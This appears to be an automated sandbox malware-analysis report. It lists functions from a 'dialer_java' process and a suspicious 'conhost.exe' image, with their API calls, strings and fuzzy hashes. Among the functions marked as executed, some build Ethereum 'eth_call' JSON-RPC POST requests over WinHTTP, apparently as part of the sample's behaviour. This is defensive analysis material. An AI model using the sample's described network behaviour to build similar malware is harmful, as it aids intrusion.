Function 00007FF695DCEB10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DCEB49
realloc.MSVCRT ref: 00007FF695DCEBDD

Strings

ble for , xrefs: 00007FF695DCEB69

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: ble for
API String ID: 471065373-1503916205
Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction ID: 2b395d792b2e8c95cc58f276cdd83ae85ff9434e2b6001ba87a454e7a31abd4a
Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction Fuzzy Hash: 09318EB2A05B4A82EF298F16E54017D67A1FB98FD0F048172CF9E47764DF2CE9998304

Function 00007FF695DCD2D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCD313

Strings

std, xrefs: 00007FF695DCD36F

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: std
API String ID: 2803490479-2826573480
Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction ID: 8aecc101a4837d54cf0981203c82b92729d44bc51ae120ce5fe07d89b7e2a8dd
Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
Instruction Fuzzy Hash: AA31D43260A78285EE75AB14E8043B973E4EB05F40F451276CE9D8B391DF3CE94A8318

Function 00007FF695DDEF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDEFAA
realloc.MSVCRT ref: 00007FF695DDF037

Strings

vector[, xrefs: 00007FF695DDEFBF

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: vector[
API String ID: 471065373-3542213508
Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction ID: 3f4dbf552e1695b213800922283f03e579bd6d8bc6571becff8dbc084481263a
Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
Instruction Fuzzy Hash: 083183B6A05B4A82DF398F16E55427DA3A1EB58FC0F048572CF9E47764DF2CD8558304

Function 00007FF695DD94E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD9520
realloc.MSVCRT ref: 00007FF695DD95B3

Strings

&, xrefs: 00007FF695DD9545

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: &
API String ID: 471065373-1010288
Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction ID: 019f5426918abdb19c7e280e500b7f93904c0381801121a436c1f1fd69665696
Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
Instruction Fuzzy Hash: DB317AB3A09B8586DB25CF25F4402AAB7A0E758B88F048672DB9D47794EF3DD945C700

Function 00007FF695DC4A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00007FF695DC4A8C
fflush.MSVCRT ref: 00007FF695DC4B5C

Strings

libunwind: pc not in table, pc=0x%llX, xrefs: 00007FF695DC4B40

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: EntryFunctionLookupfflush
String ID: libunwind: pc not in table, pc=0x%llX
API String ID: 1930725923-1970586329
Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction ID: 65dc0a7bc8d447f88adccc6b6f031286eb44159e1b0bf00c5d1205e554c127a0
Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
Instruction Fuzzy Hash: DF31D172905B8181EB258F34E4803B873A1EF89F89F149375CE8D52384EF389895C344

Function 00007FF695DDAF70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDAFA8

Strings

r"" , xrefs: 00007FF695DDAFC7
operator, xrefs: 00007FF695DDAFB9

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: operator$r""
API String ID: 471065373-3690342460
Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction ID: 16ee49efdca5239d421abe5049da6352638d912b3bb0616fbbfa239498bed5ad
Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
Instruction Fuzzy Hash: F711B2B2A05B9582EE299F46E6400A8A7A1EB98FD0F009572CF4D47754DF28D9E68700

Function 00007FF695DC2390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF695DC23EA

Strings

Unknown error, xrefs: 00007FF695DC23B4
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF695DC23DD

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction ID: 71d36b1102feb9258ef6507dbc2be1e56ad2dab3689c5861475ae7238a8a7315
Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction Fuzzy Hash: 79F0C82190D94582D6309B24E94107DA3A1EB49BC1F40A371DF8DD7251DF1CE98A8304

Function 00007FF695DE0777 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF695DE0779
strlen.MSVCRT ref: 00007FF695DE0AE1

Strings

(null), xrefs: 00007FF695DE0781

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: strerrorstrlen
String ID: (null)
API String ID: 960536887-3941151225
Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction ID: 45005370fe30e5fb5adcaed1fb505e28058017e3f6f5400b7bf31712131d97e3
Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction Fuzzy Hash: C3E04F10F0E10781E925A65154111FEE5D2DFC4F90F9862B5DA0EC2286DE2CFD4E8199

Function 00007FF695DC35C0 Relevance: 5.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF695DC35F6
strcmp.MSVCRT ref: 00007FF695DC360E
strcmp.MSVCRT ref: 00007FF695DC3629
strcmp.MSVCRT ref: 00007FF695DC3641

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction ID: 4dd8085e7e6576fc3c2d718f2a9b51cdfcfdae595c2d6d55b07efb1c7521dfcc
Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction Fuzzy Hash: 66213072A4974282EE708A12E145139A6D0FF05F94F45A6B1CF8E87790DF3DEC898B04

Function 00007FF695DC4FFE Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF695DC5012
TlsGetValue.KERNEL32 ref: 00007FF695DC504B
GetLastError.KERNEL32 ref: 00007FF695DC5050
LeaveCriticalSection.KERNEL32 ref: 00007FF695DC50CC

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction ID: b5d7154c8abaf90b8aa953bdd25c7c821da7c07820f28cb81f836688f5d84da9
Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction Fuzzy Hash: 16012C25B1960281FA758B11EA0027423E0FF00F90F5466B1CD0ED7694EF2DBC8DA244

Analysis Process: conhost.exePID: 7544, Parent PID: 7984COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.7%
Total number of Nodes:	147
Total number of Limit Nodes:	7

Executed Functions

Function 00000001400938C0 Relevance: 59.9, APIs: 23, Strings: 11, Instructions: 444
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140008620: strlen.MSVCRT ref: 000000014000863B
Part of subcall function 0000000140008620: memcpy.MSVCRT ref: 00000001400086BC
Part of subcall function 0000000140008620: memcpy.MSVCRT ref: 00000001400086E0

WinHttpOpen.WINHTTP(00000000,?,?,?,00000000,?,00000000,?,0000000140077DBE), ref: 0000000140093CD0
WinHttpConnect.WINHTTP(?,0000000140077DBE), ref: 0000000140093D00
WinHttpCloseHandle.WINHTTP ref: 0000000140093D1D
WinHttpOpenRequest.WINHTTP(?,0000000140077DBE), ref: 0000000140093D4C
WinHttpAddRequestHeaders.WINHTTP(?,0000000140077DBE), ref: 0000000140093D71
WinHttpSendRequest.WINHTTP(?,0000000140077DBE), ref: 0000000140093DCE
WinHttpReceiveResponse.WINHTTP(?,0000000140077DBE), ref: 0000000140093DE1
WinHttpQueryDataAvailable.WINHTTP(?,0000000140077DBE), ref: 0000000140093E38
strlen.MSVCRT ref: 0000000140093F2A
memcpy.MSVCRT ref: 00000001400941CE

Strings

[{"to":", xrefs: 00000001400939D2
POST, xrefs: 0000000140093D3C
{"jsonrpc":"2.0","method":", xrefs: 0000000140093B3D
eth_call, xrefs: 0000000140093A87
":", xrefs: 0000000140093F0E
basic_string, xrefs: 00000001400938C4
,"id":1}, xrefs: 0000000140093BD2
","params":, xrefs: 0000000140093B8A
","data":", xrefs: 0000000140093A17
2"result, xrefs: 0000000140093EFC
"},"latest"], xrefs: 0000000140093A68

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: Http$Requestmemcpy$Openstrlen$AvailableCloseConnectDataHandleHeadersQueryReceiveResponseSend
String ID: ","data":"$","params":$":"$"},"latest"]$,"id":1}$2"result$POST$[{"to":"$basic_string$eth_call${"jsonrpc":"2.0","method":"
API String ID: 2791491967-3056609243
Opcode ID: 4b4c3e4e344ac237899a241df8af14d9851d48d2cffd9456e85186e710b9d624
Instruction ID: 395b770b5c7af2996f2bb0faf43c56df17577d89683d3ab35281ffd1cc09df53
Opcode Fuzzy Hash: 4b4c3e4e344ac237899a241df8af14d9851d48d2cffd9456e85186e710b9d624
Instruction Fuzzy Hash: 38226B32219BC091EA62DB16E4547DAB7A0FB99BC4F844215EF8907BB9DF7DC185CB00

Function 00000001400938E0 Relevance: 42.5, APIs: 14, Strings: 10, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140008620: strlen.MSVCRT ref: 000000014000863B
Part of subcall function 0000000140008620: memcpy.MSVCRT ref: 00000001400086BC
Part of subcall function 0000000140008620: memcpy.MSVCRT ref: 00000001400086E0

WinHttpOpen.WINHTTP(00000000,?,?,?,00000000,?,00000000,?,0000000140077DBE), ref: 0000000140093CD0
WinHttpConnect.WINHTTP(?,0000000140077DBE), ref: 0000000140093D00
WinHttpOpenRequest.WINHTTP(?,0000000140077DBE), ref: 0000000140093D4C
WinHttpAddRequestHeaders.WINHTTP(?,0000000140077DBE), ref: 0000000140093D71
WinHttpSendRequest.WINHTTP(?,0000000140077DBE), ref: 0000000140093DCE
WinHttpReceiveResponse.WINHTTP(?,0000000140077DBE), ref: 0000000140093DE1
WinHttpQueryDataAvailable.WINHTTP(?,0000000140077DBE), ref: 0000000140093E38

Strings

[{"to":", xrefs: 00000001400939D2
POST, xrefs: 0000000140093D3C
{"jsonrpc":"2.0","method":", xrefs: 0000000140093B3D
eth_call, xrefs: 0000000140093A87
":", xrefs: 0000000140093F0E
,"id":1}, xrefs: 0000000140093BD2
","params":, xrefs: 0000000140093B8A
","data":", xrefs: 0000000140093A17
2"result, xrefs: 0000000140093EFC
"},"latest"], xrefs: 0000000140093A68

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: Http$Request$Openmemcpy$AvailableConnectDataHeadersQueryReceiveResponseSendstrlen
String ID: ","data":"$","params":$":"$"},"latest"]$,"id":1}$2"result$POST$[{"to":"$eth_call${"jsonrpc":"2.0","method":"
API String ID: 2989535152-3677101150
Opcode ID: 7ecb4fbb299d8fa4d1d7870b545fb05bee1ea912ab1d48d273d7aa9b0d22fca7
Instruction ID: 0a45e1406e5982f59f2fc6c2af5c977d43a1ba62ab2a44750232788bd8db90d7
Opcode Fuzzy Hash: 7ecb4fbb299d8fa4d1d7870b545fb05bee1ea912ab1d48d273d7aa9b0d22fca7
Instruction Fuzzy Hash: 0A228C32209BC481EB62DB26E4547DAA7A0F7997C8F844215EF8903AF9DF7DC585CB00

Function 000000014000118B Relevance: 13.6, APIs: 9, Instructions: 108
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00000001400011A5
_amsg_exit.MSVCRT ref: 00000001400011CC
_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT ref: 000000014000132D

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: f966cf897d97fdcf5acb0abb22ecb3022c1e754601a9a2c90eff2e84d0d997fd
Instruction ID: 21dee5a7ed0ca65fc6d424eccaaee05dcc08f95fcafea58f694c788d6d797d4f
Opcode Fuzzy Hash: f966cf897d97fdcf5acb0abb22ecb3022c1e754601a9a2c90eff2e84d0d997fd
Instruction Fuzzy Hash: BC412271621A4481FB13EF67E9953E927A1BB8DBC0F544026FB1D877B2EE78C8528740

Function 00000001400011D8 Relevance: 10.6, APIs: 7, Instructions: 78
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT ref: 000000014000132D

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
String ID:
API String ID: 3825114775-0
Opcode ID: cd529101cb3d552ffe56ca7f6f6cafa5fe4ac04abfacc2703eee019911aeddd2
Instruction ID: 29b869ab2201ac9beb41dab9bde1d337671c7ceb1fe94e3e0536dbf6f4817cf2
Opcode Fuzzy Hash: cd529101cb3d552ffe56ca7f6f6cafa5fe4ac04abfacc2703eee019911aeddd2
Instruction Fuzzy Hash: 76413271624A4081FB03EF5BE9957E927A1AB8D7C0F644026FB5D877F2DE78C8518340

Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtPrePrepareEnlistment.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: EnlistmentPrepare
String ID:
API String ID: 1523963513-0
Opcode ID: 8baeaa0fe46b9fd153a9591ff63a8e66d8f73cf464ffbb02ffea3afa27d4d265
Instruction ID: 9769505dc877c755ef1a66d12fa02d8a58e0d2ff773e7078621484e8e542cc65
Opcode Fuzzy Hash: 8baeaa0fe46b9fd153a9591ff63a8e66d8f73cf464ffbb02ffea3afa27d4d265
Instruction Fuzzy Hash: F7F09272628F4486E615EF92F86179ABBB4FB8D7C4F209819BB8857735DB38C1508B40

Function 0000000140009160 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 0000000140009169

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 2fcf3f04090baae08fa3fc254beacda5c76ef387cc071797ec1762ad5d5a440d
Instruction ID: c72e2d42099851fc4d0c1a05dabe26e78e9c7c2fbeb74e026d7c8f13036d011a
Opcode Fuzzy Hash: 2fcf3f04090baae08fa3fc254beacda5c76ef387cc071797ec1762ad5d5a440d
Instruction Fuzzy Hash: 4DB09236B28880C2C612EF48E8422597731F7A8B8CFD00100E34D42634CE28C6AACE00

Non-executed Functions

Function 0000000140035080 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

BCryptDestroyHash.BCRYPT ref: 00000001400350BC
BCryptDestroyKey.BCRYPT ref: 00000001400350D2
BCryptCloseAlgorithmProvider.BCRYPT ref: 00000001400350E9
free.MSVCRT ref: 00000001400350F9
BCryptOpenAlgorithmProvider.BCRYPT ref: 0000000140035127
BCryptDestroyHash.BCRYPT ref: 000000014003513C
BCryptDestroyKey.BCRYPT ref: 0000000140035152
BCryptCloseAlgorithmProvider.BCRYPT ref: 0000000140035169
